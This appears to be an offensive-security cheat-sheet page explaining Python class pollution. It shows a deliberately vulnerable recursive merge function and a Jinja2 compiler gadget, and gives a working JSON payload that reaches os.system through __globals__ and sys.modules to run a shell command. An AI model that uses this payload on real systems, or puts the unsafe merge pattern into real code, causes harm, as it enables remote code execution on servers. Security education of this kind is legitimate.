Class Pollution

Definition

Class pollution is a security flaw that enables an attacker to alter class variables. Depending on the available gadgets, this could result in file access or even remote code execution.

Examples

Pydash set_ and set_with functions or custom merge function:

def merge(source, destination):
    for key, value in source.items():
        if hasattr(destination, "get"):
            if destination.get(key) and type(value) == dict:
                merge(value, destination.get(key))
            else:
                destination[key] = value
        elif hasattr(destination, key) and type(value) == dict:
            merge(value, getattr(destination, key))
        else:
            setattr(destination, key, value)

Gadgets

Jinja2

RCE

Jinja source code: https://github.com/pallets/jinja/blob/3.1.2/src/jinja2/compiler.py#L839

def visit_Template(
    self, node: nodes.Template, frame: t.Optional[Frame] = None
) -> None:
    assert frame is None, "no root frame allowed"
    eval_ctx = EvalContext(self.environment, self.name)

    from .runtime import exported, async_exported

    if self.environment.is_async:
        exported_names = sorted(exported + async_exported)
    else:
        exported_names = sorted(exported)

    self.writeline("from jinja2.runtime import " + ", ".join(exported_names))

Payload:

{"__init__":{"__globals__":{"__loader__": {"__init__":{"__globals__":{"sys":{"modules": {"jinja2":{"runtime":{"exported":["*;__import__('os').system('sleep 7');#"]}}}}}}}}}}

References

Burpsuite

Content-Type

Docs

OffensiveWeb

Title here

Class Pollution

Definition

Examples

Gadgets

Jinja2

RCE

References

Class Pollution

Definition#

Examples#

Gadgets#

Jinja2#

RCE#

References#

Definition

Examples

Gadgets

Jinja2

RCE

References